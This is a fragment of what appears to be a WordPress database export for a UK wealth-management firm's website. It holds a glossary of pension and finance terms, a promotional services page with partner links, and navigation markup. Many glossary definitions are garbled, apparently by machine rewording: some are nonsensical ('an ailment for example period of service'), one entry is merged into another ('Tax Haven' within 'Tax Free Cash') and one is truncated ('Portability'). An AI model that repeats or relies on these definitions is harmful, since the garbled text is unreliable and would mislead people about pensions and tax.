held in bonds, stocks, real-estate, etc.</dd>&#13;\n<dt>BASIC STATE PENSION</dt>&#13;\n<dd>The flat rate state pension accessible to everyone upon reaching State Retirement, provided sufficient N. I. contributions are created.</dd>&#13;\n<dt>BENEFICIARY</dt>&#13;\n<dd>an individual who within the death of the plan member or former member, could become allowed to one advantage underneath the plan.</dd>&#13;\n<dt>BENEFIT</dt>&#13;\n<dd>generally, any type of payment to which an individual could become entitled underneath the terms of the plan, but often refers specifically towards the pension normally supplied by the program formula.</dd>&#13;\n<dt>BEST FIVE-YEAR AVERAGE</dt>&#13;\n<dd>one advantage formula that determines the quantity of a member’s pension by making use of the member’s average earnings throughout the five years when earnings were highest.</dd>&#13;\n<dt>CAPITAL GAINS TAX</dt>&#13;\n<dd>Capital Gains Tax is really a tax within the profit you make whenever you sell or perhaps get rid of something you possess, eg. property or share. There exists a tax-free allowance and some extra reliefs which could lower your Capital Gains Goverment tax bill.</dd>&#13;\n<dt>CAREER AVERAGE PLAN</dt>&#13;\n<dd>a detailed benefit plan that applies the device of great benefit to earnings from the member in every year of service, and never towards the final or final average earnings.</dd>&#13;\n<dt>COMMUTED VALUE</dt>&#13;\n<dd>the quantity of a lump sum payment payable today estimated to become equal in value to some future number of payments.</dd>&#13;\n<dt>CONTRACTING OUT INCENTIVE</dt>&#13;\n<dd>It was an extra payment more than the Contracting Out rebate, made to encourage certain individuals to contract from SERPS. Incentive payments ceased on 5th April 1997.</dd>&#13;\n<dt>CONTRACTING OUT REBATE</dt>&#13;\n<dd>Amount through which the employer’s and employee’s National Insurance contributions are reduced by virtue of the employee’s membership of the contracted out pension arrangement.</dd>&#13;\n<dt>CONTRIBUTION</dt>&#13;\n<dd>Alternative word to premium, usually used regarding the personal payments in to a pension scheme, or investment based products</dd>&#13;\n<dt>CONTRIBUTORY PLAN</dt>&#13;\n<dd>a pension plan which requires the employees to create contributions by payroll deduction to be able to be eligible for benefits underneath the plan.</dd>&#13;\n<dt>CREDITED SERVICE</dt>&#13;\n<dd>period of service utilized in the program formula to calculate a detailed benefit.</dd>&#13;\n<dt>DATA PROTECTION ACT 1984</dt>&#13;\n<dd>Established rules for storage and disclosure of personal details by computer.</dd>&#13;\n<dt>DEFERRED MEMBERS</dt>&#13;\n<dd>terminated employees that are entitled to a deferred vested pension. Considered by legislation to become former members.</dd>&#13;\n<dt>DEFERRED VESTED PENSION</dt>&#13;\n<dd>a specified pension determined during the time of termination of employment or termination of the plan however, not payable until some later date.</dd>&#13;\n<dt>DEFINED BENEFIT PLAN</dt>&#13;\n<dd>a pension plan that defines the pension to become provided (depending on service, average earnings, etc ) however, not the entire contributions. When the plan is contributory, the pace of employee contributions might be specified, using the employer paying the total amount from the cost. To become distinguished from the defined contribution plan.</dd>&#13;\n<dt>DEFINED CONTRIBUTION PLAN</dt>&#13;\n<dd>a strategy under which the quantity of the employer contribution per plan member and, where applicable, the quantity of the employee contribution is specified ahead of time and also the benefits to become received through the pensioner is calculated in the date of retirement in line with the accumulated contributions and also the return within the investment from the contributions.</dd>&#13;\n<dt>ELIGIBILITY REQUIREMENT</dt>&#13;\n<dd>an ailment for example period of service that needs to be met before a worker is permitted or necessary to join a pension plan. Term may make reference to the eligibility definitely benefits.</dd>&#13;\n<dt>EMPLOYEE</dt>&#13;\n<dd>means a person, who contributes labor and expertise to an endeavor of an employer and is usually hired to perform specific duties which are packaged into a job. To be remunerated for the work or service you provide</dd>&#13;\n<dt>EMPLOYER</dt>&#13;\n<dd>a person or business that employs one or more people, especially for wages or salary</dd>&#13;\n<dt>EMPLOYMENT PENSION PLAN</dt>&#13;\n<dd>is an arrangement to provide people with an income during retirement when they are no longer earning a steady income from employment. Often employment pension plans require both the employer and employee to contribute money to a fund during their employment in order to receive defined benefits upon retirement. It is a tax deferred savings vehicle that allows for the tax-free accumulation of a fund for later use as a retirement income.</dd>&#13;\n<dt>ETHICAL INVESTMENT</dt>&#13;\n<dd>Making investments only in companies that are considered acceptable based on some criteria concerning the kind of product, environmental issues and political issues.</dd>&#13;\n<dt>FACT FIND</dt>&#13;\n<dd>An essential stage within the advice cycle, one that enables the adviser to remove all pertinent details about a potential client, and also to update information already held concerning a current client.</dd>&#13;\n<dt>FINAL SALARY SCHEME</dt>&#13;\n<dd>A pension scheme providing pension benefit by mention of the the scheme member’s salary at or near retirement.</dd>&#13;\n<dt>FLAT BENEFIT PLAN</dt>&#13;\n<dd>a detailed benefit plan that specifies some pension to become credited for every year of service.</dd>&#13;\n<dt>FORMER MEMBER</dt>&#13;\n<dd>means an individual whose membership within a plan has terminated and who retains something special or future entitlement to some benefit pursuant to some plan. A pensioner would be described as a former member, as would an individual that is allowed to a deferred vested pension.</dd>&#13;\n<dt>FULLY FUNDED</dt>&#13;\n<dd>a term describing a strategy which, in a given time, has sufficient assets to supply for many accrued benefits.</dd>&#13;\n<dt>FUNDING</dt>&#13;\n<dd>systematic monthly obligations in to a pension fund which, with investment earnings on these funds, are meant to provide for benefits because they become payable.</dd>&#13;\n<dt>GUARANTEED ANNUITY</dt>&#13;\n<dd>an annuity which is covered the duration of an individual or for any certain period whichever is longer, but the point is for any minimum period, e. g., if an annuitant having a five year guarantee dies after 3 years, payment is going to be continued to some beneficiary or the estate for 2 years.</dd>&#13;\n<dt>GROUP PENSION</dt>&#13;\n<dd>Generally operated by an employer for several employees and can be a ‘conventional’ scheme in which the employer helps fund the arrangement; or can be a group personal pension scheme in which the grouping is just for administrative convenience. Alternative name for occupational pension scheme.</dd>&#13;\n<dt>GUARANTEED MINIMUM PENSION</dt>&#13;\n<dd>Whenever a group occupational pension scheme contracts from SERPS, the scheme must give a minimum pension according of the quantity of state pension foregone. This is actually the GMP, and it is approximately corresponding to SERPS, for your same period. A part of this type of scheme is going to get a pension at State Pension Age no less than the SERPS equivalent. The GMP principle ceased for benefits accrued after 6th April 1997, once the Reference Share principle was established.</dd>&#13;\n<dt>INDEXING</dt>&#13;\n<dd>a provision within a pension plan calling for periodic adjustments to benefits (usually after retirement) based on a formula depending on an established index of price or wage levels like the Consumer Price Index.</dd>&#13;\n<dt>LEVEL PREMIUMS</dt>&#13;\n<dd>The incidence of mortality implies that the chance of death generally increases with age. To fit this risk increase, premiums should, theoretically, increase in the same rate. As this could at some time make the price prohibitive and unattractive, it is among the most norm to calculate reduced which will remain level through the entire term from the contract. This effectively means ‘overpaying’ in the beginning from the contract, that will counterbalance the ‘underpayment’ later.</dd>&#13;\n<dt>MANDATE</dt>&#13;\n<dd>Instruction, order, permission to permit or permit something to occur. Usually written e. g. bank mandate, such as a standing order to pay for sums to a different account. Mandatory. Compulsory, a thing that should be done.</dd>&#13;\n<dt>MEMBER</dt>&#13;\n<dd>a worker on whose behalf an employer is needed to make contributions to some pension plan and that has not terminated his / her membership or commenced his / her pension.</dd>&#13;\n<dt>MONEY PURCHASE PLAN</dt>&#13;\n<dd>see Defined Contribution Plan .</dd>&#13;\n<dt>NATIONAL INSURANCE CONTRIBUTIONS</dt>&#13;\n<dd>An extra type of tax paid by most employers, employees, self-employed (plus some unemployed) people. For your employed it really is deducted from income through the employer on the scale associated with income levels. The employed pay part flat rate, part income related. The self-employed and also the unemployed may pay a designated rate voluntary contribution to maintain their benefits entitlement updated.</dd>&#13;\n<dt>NET RELEVANT EARNINGS</dt>&#13;\n<dd>A definition of ‘pensionable income’ for your self-employed through which Personal Pension Plan contributions are determined. Relevant earnings less business expenses (includes stock relief deductions, losses or capital allowances). NRE for employed PPP holders is effectively gross PAYE pay.</dd>&#13;\n<dt>NON-CONTRIBUTORY PLAN</dt>&#13;\n<dd>a pension plan by which all required contributions are created through the employer.</dd>&#13;\n<dt>NORMAL RETIREMENT DATE</dt>&#13;\n<dd>the date where the member becomes allowed to retirement benefits without reduction or increase.</dd>&#13;\n<dt>OCCUPATIONAL PENSION SCHEME</dt>&#13;\n<dd>A pension scheme established by an employer, usually on the group basis.</dd>&#13;\n<dt>OMBUDSMAN</dt>&#13;\n<dd>The who investigates complaints through the public against official bodies, large organisations or industry sector participants.</dd>&#13;\n<dt>PENSION</dt>&#13;\n<dd>generally any periodic payment payable for your duration of an individual that has become allowed to this type of benefit pursuant towards the terms of the pension plan.</dd>&#13;\n<dt>PENSION FUND</dt>&#13;\n<dd>General term utilized to describe an investment fund accumulated during working life and used at retirement to buy an annuity to supply a relentless income.</dd>&#13;\n<dt>PENSION INCREASES</dt>&#13;\n<dd>Once in payment, pensions may remain in the same level, increase occasionally in the discretion from the company or have contractual annual increases, as much as increases in RPI.</dd>&#13;\n<dt>PENSION PLAN</dt>&#13;\n<dd>a strategy, scheme or arrangement organized and administered to supply pensions for members and former members pursuant to which an employer is needed to make contributions.</dd>&#13;\n<dt>PORTABILITY</dt>&#13;\n<dd>possibilities to certain members on termination of employment.</dd>&#13;\n<dt>QUALIFYING SERVICE</dt>&#13;\n<dd>The time required to entitle a pension scheme member to short service benefit; currently 2 yrs. Might include previous scheme service, in case a transfer payment continues to be converted to the present scheme. Quantify. Illustrate the result of something when it comes to figures.</dd>&#13;\n<dt>REMUNERATION</dt>&#13;\n<dd>In pension planning terms generally delivered to mean the entire and total earnings package i. e. salary and benefits in kind.</dd>&#13;\n<dt>RETIREMENT</dt>&#13;\n<dd>withdrawal through the active employees due to age; could also be used within the sense of permanent withdrawal through the labour force for just about any reason, including disability.</dd>&#13;\n<dt>SCHEME ADMINISTRATOR</dt>&#13;\n<dd>The individual accountable for the management and administration of the occupational pension scheme. All exempt approved schemes must appoint an administrator in UK.</dd>&#13;\n<dt>STATE EARNINGS RELATED PENSION SCHEME</dt>&#13;\n<dd>Earnings related pension depending on earnings between LEL and UEL. State Pension Age. Fixed retirement ages for women and men, currently 65 and 60 respectively. To become equalised to 65 for women and men, from April 2020 (with several years phasing in from 2010).</dd>&#13;\n<dt>SURPLUS</dt>&#13;\n<dd>in case a pension plan’s assets exceed the plan’s liabilities, the difference is known as a surplus.</dd>&#13;\n<dt>SURVIVOR PENSION OR SURVIVOR BENEFIT</dt>&#13;\n<dd>a monthly benefit payable under a pension intend to the surviving spouse of the deceased member or former member.</dd>&#13;\n<dt>TAX EFFICIENT</dt>&#13;\n<dd>There are a variety of various kinds of tax efficient investments and investment strategies. INvestoocan provide you with suggestions about that are the best ones for you personally.</dd>&#13;\n<dt>TAX FREE CASH</dt>&#13;\n<dd>Both occupational and personal pensions permit a particular account of cash to become taken rather than pension through the pension fund at retirement. This may not affect FSAVCs, and Rebate Only pension arrangements Tax Haven. A country which legally enables individuals and companies from a foreign land to prevent or pay lower rates of tax by letting them live or base their operations there.</dd>&#13;\n<dt>TAX RELIEF</dt>&#13;\n<dd>The system of exemptions and deductions on income and expenditure whereby the Tax Inspector can identify taxable income.</dd>&#13;\n<dt>TERMS of BUSINESS LETTER</dt>&#13;\n<dd>Document which should be provided to client by financial advisers a lot of transaction of business. Normally signed by client and adviser. Contents vary based on nature of services on offer. Must include information on advisers status, polarisation, approach to remuneration, adviser’s obligations and complaints procedure.</dd>&#13;\n<dt>TERMINATION OF MEMBERSHIP OR EMPLOYMENT</dt>&#13;\n<dd>severance from the employment relationship for just about any reason besides death and retirement.</dd>&#13;\n<dt>TERMINATION OF PLAN</dt>&#13;\n<dd>this occurs whenever a pension plan ceases to work. All members are vested and allowed to get a pension.</dd>&#13;\n<dt>TRANSFER VALUE</dt>&#13;\n<dd>Generally delivered to mean the money value of accrued pension benefit within an occupational pension scheme.</dd>&#13;\n<dt>UNFUNDED LIABILITY</dt>&#13;\n<dd>any amount through which the assets of the pension plan are under its liabilities on the going concern basis.</dd>&#13;\n<dt>VESTED BENEFITS (VESTING)</dt>&#13;\n<dd>benefits to which a worker has unconditional entitlement underneath the plan due to satisfying age or service requirements.</dd>&#13;\n<dt>WINDNG UP</dt>&#13;\n<dd>The termination of the pension scheme, where assets are more comfortable with buy the accrued liabilities from the pension scheme, either by purchasing immediate and deferred annuities, or transfer to a different pension scheme.</dd>&#13;\n</dl></div><!-- end .entry-content -->&#13;\n		&#13;\n	</div><!-- end .postclass -->&#13;\n			<div id=\"comments\">&#13;\n					</div><!--end #comments-->&#13;\n										<div id=\"respond\">&#13;\n				<h3 id=\"reply-title\">Ask a Question or Leave a Comment <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../wealth-management-glossary/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\">&#13;\n																										<p class=\"comment-form-author\"><input id=\"author\" name=\"author\" type=\"text\" value=\"\" size=\"30\" tabindex=\"1\" aria-required=\"true\" /><label for=\"author\">Name</label> <span class=\"required\">*</span></p><!-- #form-section-author .form-section -->&#13;\n<p class=\"comment-form-email\"><input id=\"email\" name=\"email\" type=\"text\" value=\"\" size=\"30\" tabindex=\"2\" aria-required=\"true\" /><label for=\"email\">Email</label> <span class=\"required\">*</span></p><!-- #form-section-email .form-section -->&#13;\n<p class=\"comment-form-url\"><input id=\"url\" name=\"url\" type=\"text\" value=\"\" size=\"30\" tabindex=\"3\" /><label for=\"url\">Website</label></p><!-- #form-section-url .form-section -->&#13;\n												<p class=\"comment-form-comment\"><textarea id=\"comment\" name=\"comment\" cols=\"45\" rows=\"8\" tabindex=\"4\" aria-required=\"true\"></textarea></p><!-- #form-section-comment .form-section -->												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"submit\" value=\"Post Comment\" /><input type=\"hidden\" name=\"comment_post_ID\" value=\"318\" id=\"comment_post_ID\" /></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"372f9718a7\" /></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n								</div><!-- end #content -->&#13;\n		<div id=\"sidebar\" class=\"sidebar widget-area\">&#13;\n<div id=\"text-3\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><!-- AddThis Button BEGIN -->&#13;\n<div class=\"addthis_toolbox addthis_default_style addthis_32x32_style\">&#13;\n<a class=\"addthis_button_linkedin\"></a>&#13;\n<a class=\"addthis_button_twitter\"></a>&#13;\n<a class=\"addthis_button_facebook\"></a>&#13;\n<a class=\"addthis_button_compact\"></a>&#13;\n<a class=\"addthis_counter addthis_bubble_style\"></a>&#13;\n</div>&#13;\n&#13;\n<!-- AddThis Button END --></div>&#13;\n		</div></div>&#13;\n<div id=\"text-2\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><div id=\"sidebar-contact-form\"><div class=\"wpcf7\" id=\"wpcf7-f447-w1-o1\"><form action=\"../wealth-management-glossary/\" method=\"post\" class=\"wpcf7-form\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"447\" /><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.2\" /><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f447-w1-o1\" /><input type=\"hidden\" name=\"_wpnonce\" value=\"fd287ba6f5\" /></div>&#13;\n<p>Your Name (required)<br /><span class=\"wpcf7-form-control-wrap your-name\"><input type=\"text\" name=\"your-name\" value=\"\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" size=\"40\" /></span> </p>&#13;\n<p>Your Email (required)<br /><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"text\" name=\"your-email\" value=\"\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" size=\"40\" /></span> </p>&#13;\n<p>Your Message<br /><span class=\"wpcf7-form-control-wrap your-message\"><textarea name=\"your-message\" class=\"wpcf7-form-control  wpcf7-textarea\" cols=\"40\" rows=\"10\"></textarea></span> </p>&#13;\n<div class=\"side-contact-submit\"><input type=\"submit\" value=\"Send Your Message\" class=\"wpcf7-form-control  wpcf7-submit\" /></div>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"></div></form></div></div></div>&#13;\n		</div></div>&#13;\n<div id=\"text-4\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><div class=\"tel\">Or call us on <em></em></div></div>&#13;\n		</div></div>&#13;\n</div>&#13;\n	</div><!-- end #content-sidebar-wrap -->&#13;\n	<div class=\"after_content_sidebar_wrap\"><div id=\"text-5\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><div class=\"preferred-providers\">A few of our preferred providers</div></div>&#13;\n		</div></div>&#13;\n</div><!-- end .after_content_sidebar_wrap --></div><!-- end .wrap --></div><!-- end #inner --><div id=\"footer\" class=\"footer\"><div class=\"wrap\"><div id=\"footer-nav\">&#13;\n<ul><li><a href=\"/\">Wealth Management</a></li>&#13;\n<li><a href=\"../about-us/frequently-asked-questions/\">FAQs</a></li>&#13;\n<li><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n<li><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n<li><a href=\"../wealth-management-glossary/\">Glossary of Wealth Management Terms</a></li>&#13;\n<li><a href=\"../site-map/\">Site map</a></li>&#13;\n<li><a href=\"https://rsr.wrapadviser.co.uk/\">Login</a></li>&#13;\n</ul></div>&#13;\n<p> </p>&#13;\n<div class=\"creds\"><p>© Copyright  2017 Equity SMART</p></div></div><!-- end .wrap --></div><!-- end #footer -->&#13;\n</div><!-- end #wrap -->&#13;\n<script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($) {$(\".myController\").jFlow({controller: \".jFlowControl\",slideWrapper : \"#jFlowSlider\",slides: \"#slides\",selectedWrapper: \"jFlowSelected\",width: \"870px\",height: \"400px\",timer: 6000,duration: 1000,loop: 1,effect: \"right\",prev: \".slider-previous\",next: \".slider-next\",auto: true});});]]></script><script type=\"text/javascript\"><![CDATA[\r\n\r\nvar addthis_config = {\"data_track_clickback\":false,\"data_track_addressbar\":false,\"data_track_textcopy\":false};\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/q-and-a/js/qa.js\"></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/jquery.form.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"></script><script type=\"text/javascript\" src=\"../wp-content/themes/genesis/lib/js/menu/superfish.js\"></script><script type=\"text/javascript\" src=\"../wp-content/themes/genesis/lib/js/menu/superfish.args.js\"></script><script type=\"text/javascript\" src=\"../wp-content/plugins/genesis-slider/js/jflow.plus.js\"></script><!--wp_footer--></body>','Glossary of Wealth Management Terms','','publish','closed','closed','','glossary-of-wealth-management-terms','','','2017-09-21 16:34:42','2017-09-21 16:34:42','',0,'http://www.equalitywalk.org.uk/glossary-of-wealth-management-terms',0,'page','',0),(115,1,'2017-09-21 16:34:42','2017-09-21 16:34:42','<a href=\"/\"><img class=\"aligncenter wp-image-230\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney-1024x759.jpg\" alt=\"Wealth Management - investing\" width=\"700\" height=\"519\" /></a>\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>Learn How to Manage Your Wealth and Investments</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. <a href=\"http://www.equalitywalk.org.uk/lump-sum-investment\">Smart investments</a> can make you money over many years.\r\n\r\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nYou could:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have<a href=\"http://www.equalitywalk.org.uk/pension-advice-will-you-have-enough-income-when-you-retire\"> savings for retiremen</a>t</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow you to <a href=\"http://www.equalitywalk.org.uk/investments-from-equity-smart\">consider the financial products</a> that will help you secure the returns that the market allows.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n<h3>Look at different options such as investing in property developments<strong>\r\n</strong></h3>\r\nDevelopments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\r\n\r\nAs financial advisors we can direct you to <strong>our trusted partners Hunter Finance</strong> who are experts in property loans.\r\n\r\n<strong><a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.</strong>\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\"><a href=\"http://www.chartwell-investment.co.uk/contentcofunds-htm\" target=\"_blank\">Independent Investment Advice</a></h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in residential property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n 	<li><a href=\"http://scottandpaterson.co.uk\" target=\"_blank\">qualified and experienced accountants</a> taking care of your finances</li>\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n 	<li>offer a range of <a href=\"http://swaleinsurance.co.uk\" target=\"_blank\">insurance options</a> for your peace of mind</li>\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','publish','closed','closed','','wealth-management','','','2017-10-12 11:25:06','2017-10-12 11:25:06','',0,'http://www.equalitywalk.org.uk/wealth-management',0,'page','',0),(116,1,'2017-09-21 16:34:43','2017-09-21 16:34:43','<body class=\"page page-id-34 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-34 current_page_item menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li 